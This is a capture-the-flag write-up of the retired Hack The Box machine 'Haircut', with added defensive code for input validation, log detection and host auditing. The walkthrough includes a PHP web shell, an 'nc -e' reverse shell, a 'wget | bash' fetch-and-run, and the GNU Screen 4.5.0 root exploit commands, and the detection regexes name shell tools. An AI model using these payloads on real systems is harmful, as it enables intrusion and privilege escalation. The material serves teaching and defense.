This is the write-up for the box Haircut, which was retired on 30 September 2017. My IP address was 10.10.14.23 while I did this.
Let's put this in our hosts file:
10.10.10.24 haircut.htb
Starting with a Nmap scan:
nmap -sC -sV -oN nmap/haircut.nmap 10.10.10.24
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
On the web page there is a photo of a person and nothing interesting in the source. Let's search for hidden paths and PHP files with Gobuster:
gobuster dir -u http://10.10.10.24/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
The results are the path /uploads (HTTP 403 Forbidden), a page /test.html, which is a picture of hair, and /exposed.php, which shows a form with an input field and a Go button.
When clicking on Go, it returns the test.html page. If we start a web server and enter the IP of our server in the field, it tries to connect to us.
Special characters such as semicolons and pipes are filtered, with a warning that those characters can't be used.
Entering anything else into the field displays an error from curl, which means the application builds a curl command to fetch the file.
Let's send this to Burp Suite's Repeater to try some things with cURL.
We can try to pass cURL parameters in there:
formurl=--version&submit=Go
This works and displays the version number of cURL, so let's try to upload something into the /uploads directory with it:
formurl=-o uploads/test.html http://10.10.14.23:8000/test.html&submit=Go
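The flaw abused here is argument injection rather than shell injection: the input lands where curl reads its options, so the application's filter on semicolons and pipes changes nothing. As an added example, not code from the write-up or from the box, here is how a fetch handler of this kind should treat a user-supplied target: an allowlist on the value and an argv in which the value can never be read as an option. The names validate_fetch_target, build_curl_argv and fetch are my own; the curl flags used are real curl options.

```python
# Added example (not from the write-up): server-side handling of a
# user-supplied fetch target.  The exploited bug is argument injection,
# so the fix is allowlist validation plus an argv where the value can
# never be interpreted as a curl option.
import re
import subprocess
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Hostnames and dotted IPv4 only; IPv6 literals are deliberately rejected.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?$")


class RejectedInput(ValueError):
    """Raised when a fetch target fails validation; the message is safe to log."""


def validate_fetch_target(user_input: str) -> str:
    """Return the input if it is a plain http(s) URL, otherwise raise RejectedInput."""
    value = user_input.strip()
    if not value or any(ch.isspace() for ch in value):
        raise RejectedInput("empty input or embedded whitespace")
    if value.startswith("-"):
        # '--version', '-o uploads/test.html ...' and friends are curl options
        raise RejectedInput("option-like input")
    parts = urlsplit(value)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise RejectedInput(f"scheme not allowed: {parts.scheme or 'none'}")
    if not HOSTNAME_RE.match(parts.hostname or ""):
        raise RejectedInput("missing or malformed host")
    if parts.username or parts.password:
        raise RejectedInput("credentials embedded in URL")
    return value


def is_accepted(user_input: str) -> bool:
    """Convenience wrapper for the form handler's error path (and for tests)."""
    try:
        validate_fetch_target(user_input)
        return True
    except RejectedInput:
        return False


def build_curl_argv(user_input: str, dest: str) -> list:
    """Build the curl command line; every element except the URL is fixed by the app."""
    target = validate_fetch_target(user_input)
    return [
        "curl",
        "--silent", "--show-error",
        "--proto", "=http,https",     # stay on http(s) even across redirects
        "--max-time", "10",
        "--max-filesize", "1048576",
        "--output", dest,             # destination chosen by the application
        "--",                         # end of options: the URL cannot be read as a flag
        target,
    ]


def fetch(user_input: str, dest: str) -> int:
    """Run the fetch without a shell: argv list, no string concatenation, no shell=True."""
    argv = build_curl_argv(user_input, dest)
    return subprocess.run(argv, check=False).returncode


if __name__ == "__main__":
    for sample in ("--version",
                   "-o uploads/test.html http://10.10.14.23:8000/test.html",
                   "file:///etc/passwd",
                   "http://10.10.14.23:8000/test.html"):
        print(f"{sample!r:70} -> {'accepted' if is_accepted(sample) else 'rejected'}")
```

The two inputs used against the box (--version and the -o upload) are rejected before curl is ever started, and because the output path is fixed by the application, even a valid URL cannot write into a web-served directory.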
Requesting the test.html file, we get it back, so we can upload a PHP file to get command execution. The web shell shell.php that I will upload contains this code:
<?php echo system($_REQUEST['cmd']); ?>
Now we can request the file with the command whoami to test it:
GET /uploads/shell.php?cmd=whoami HTTP/1.1
This works and it is possible to send a command to start a reverse shell on the box.
GET /uploads/shell.php?cmd=nc -e /bin/sh 10.10.14.23 9001 HTTP/1.1
We are on the box as www-data.
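On the defending side, both the web shell and the reverse shell leave traces in the nginx access log: a PHP file answered with 200 from /uploads (a directory that should never execute scripts) and a query parameter carrying shell commands. The following detection logic is an added example, not part of the write-up, run over log lines I constructed for the demo in nginx's combined format; the function names and the parameter-name list are my own choices.

```python
# Added example (not from the write-up): detection logic over constructed
# nginx access-log lines for the two web-tier traces of the intrusion above.
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# PHP executing from the upload directory; the directory listing being 403 is fine.
UPLOAD_EXEC_RE = re.compile(r"^/uploads/.*\.(?:php|phtml|phar)$", re.I)
# Parameter names web shells commonly use for the command to run.
CMD_PARAMS = {"cmd", "c", "exec", "command"}
# Tokens that show up in shell probing and reverse-shell one-liners.
SHELL_HINT_RE = re.compile(r"\b(?:nc|ncat|bash|sh|python|perl|whoami|id)\b|/dev/tcp/")

SAMPLE_LOG = [  # constructed for the demo, not taken from the target
    '10.10.14.23 - - [30/Sep/2017:10:00:01 +0000] "GET /test.html HTTP/1.1" 200 512 "-" "curl/7.47.0"',
    '10.10.14.23 - - [30/Sep/2017:10:00:05 +0000] "POST /exposed.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.10.14.23 - - [30/Sep/2017:10:00:09 +0000] "GET /uploads/shell.php?cmd=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0"',
    '10.10.14.23 - - [30/Sep/2017:10:00:12 +0000] "GET /uploads/shell.php?cmd=nc%20-e%20/bin/sh%2010.10.14.23%209001 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.23 - - [30/Sep/2017:10:00:15 +0000] "GET /uploads/ HTTP/1.1" 403 169 "-" "Mozilla/5.0"',
]


def analyse_line(line: str):
    """Return a finding dict for a suspicious request, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    findings = []
    if UPLOAD_EXEC_RE.match(parts.path) and m.group("status") == "200":
        findings.append("php-executed-from-uploads")
    # parse_qs already percent-decodes the values; do not decode a second time,
    # double-decoding is a classic evasion hole in detection logic.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in CMD_PARAMS:
            findings.append(f"command-parameter:{name}")
            if any(SHELL_HINT_RE.search(v) for v in values):
                findings.append("shell-indicators")
    if not findings:
        return None
    return {"ip": m.group("ip"), "time": m.group("time"),
            "target": m.group("target"), "findings": findings}


def scan(lines):
    """Run analyse_line over an iterable of log lines and keep only the hits."""
    return [hit for hit in (analyse_line(l) for l in lines) if hit is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["target"], ", ".join(hit["findings"]))
```

Detection is the second line of defence here; the structural fix is to never hand files under /uploads to the PHP interpreter (a location block for that path with no fastcgi pass, or an outright deny), which turns the uploaded shell.php into an inert download.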
Now run any Linux enumeration script to get an overview of the attack surface:
wget -qO- http://10.10.14.23:8000/LinEnum.sh | bash
Looking for binaries with the Setuid bit enabled:
find / -perm -4000 2>/dev/null | xargs ls -la
The binary screen has the setuid bit set and explicitly shows the version number 4.5.0, which has a privilege escalation vulnerability. The explanation for this exploit can be found via searchsploit screen in the entry GNU Screen 4.5.0 - Local Privilege Escalation (PoC).
For this we need to create two files first; they are in this folder:
- libhax.c
- rootshell.c
Compiling the code:
gcc rootshell.c -o rootshell
gcc -fPIC -shared -ldl -o libhax.so libhax.c
This creates the shared object libhax.so and the binary rootshell.
Execute these commands one after another, and finally run the rootshell binary:
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
This will start a shell as root!
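From the defender's side, this escalation path has three auditable signals: a setuid binary that is not in the host's baseline, a screen build at the affected version, and an /etc/ld.so.preload that is writable or points at a library outside the system library directories. The audit below is an added example, not code from the write-up; it is written as pure functions over text so it runs offline, and all sample data (the find/ls output, the screen version string, the preload content and the uid/mode table) is constructed for the demo. On a real host you would feed it the output of the find command used above, of screen --version, and os.stat() results for the files named in ld.so.preload.

```python
# Added example (not from the write-up): host-side audit for the privilege
# escalation path above.  All sample data below is constructed for the demo.
import re

# Example baseline of setuid binaries; build yours from a known-good image.
EXAMPLE_BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/sudo", "/usr/bin/passwd",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

SAMPLE_FIND_OUTPUT = """\
-rwsr-xr-x 1 root root   40432 May 16  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 1588648 Jan 23  2017 /usr/bin/screen-4.5.0
-rwsr-xr-x 1 root root  136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root   40128 May 16  2017 /bin/su
"""
SAMPLE_SCREEN_VERSION = "Screen version 4.05.00 (GNU) 10-Dec-16"
SAMPLE_PRELOAD = "\n/tmp/libhax.so\n"
# path -> (owner uid, st_mode); uid 33 is www-data on Debian/Ubuntu.
SAMPLE_FILE_INFO = {
    "/etc/ld.so.preload": (0, 0o100666),   # root-owned but world-writable (umask 000)
    "/tmp/libhax.so": (33, 0o100755),
}

TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def unexpected_setuid(ls_output: str, baseline: set) -> list:
    """Setuid binaries present on the host that are not in the baseline."""
    unexpected = []
    for line in ls_output.splitlines():
        fields = line.split(None, 8)   # perms links owner group size month day year path
        if len(fields) < 9:
            continue
        perms, path = fields[0], fields[8]
        if perms[3] in "sS" and path not in baseline:   # 4th char is the setuid flag
            unexpected.append(path)
    return unexpected


def parse_screen_version(text: str):
    """'Screen version 4.05.00 (GNU) ...' -> (4, 5, 0); None if no version is found."""
    m = VERSION_RE.search(text)
    return tuple(int(x) for x in m.groups()) if m else None


def screen_is_affected(version) -> bool:
    """4.5.0 is the release the write-up exploits; the logfile bug was fixed in 4.5.1."""
    return version == (4, 5, 0)


def check_ld_preload(content: str, file_info: dict) -> list:
    """Audit /etc/ld.so.preload: the file and every library it names must be
    root-owned, not writable by group/others, and live under a trusted lib dir."""
    findings = []
    uid, mode = file_info.get("/etc/ld.so.preload", (0, 0o100644))
    if uid != 0 or mode & 0o022:
        findings.append("/etc/ld.so.preload: not root-owned or writable by others")
    for raw in content.splitlines():
        lib = raw.strip()
        if not lib or lib.startswith("#"):
            continue
        if not lib.startswith(TRUSTED_LIB_DIRS):
            findings.append(f"{lib}: outside trusted library directories")
        luid, lmode = file_info.get(lib, (None, None))
        if luid is None:
            findings.append(f"{lib}: listed but not present")
        elif luid != 0 or lmode & 0o022:
            findings.append(f"{lib}: not root-owned or writable by others")
    return findings


if __name__ == "__main__":
    print("unexpected setuid:", unexpected_setuid(SAMPLE_FIND_OUTPUT, EXAMPLE_BASELINE))
    v = parse_screen_version(SAMPLE_SCREEN_VERSION)
    print("screen", v, "affected" if screen_is_affected(v) else "ok")
    for f in check_ld_preload(SAMPLE_PRELOAD, SAMPLE_FILE_INFO):
        print("ld.so.preload:", f)
```

The ld.so.preload check is the one worth scheduling: on a clean Ubuntu host the file normally does not exist at all, so its mere appearance, let alone a world-writable copy naming a library in /tmp, is a high-confidence signal regardless of which setuid program created it.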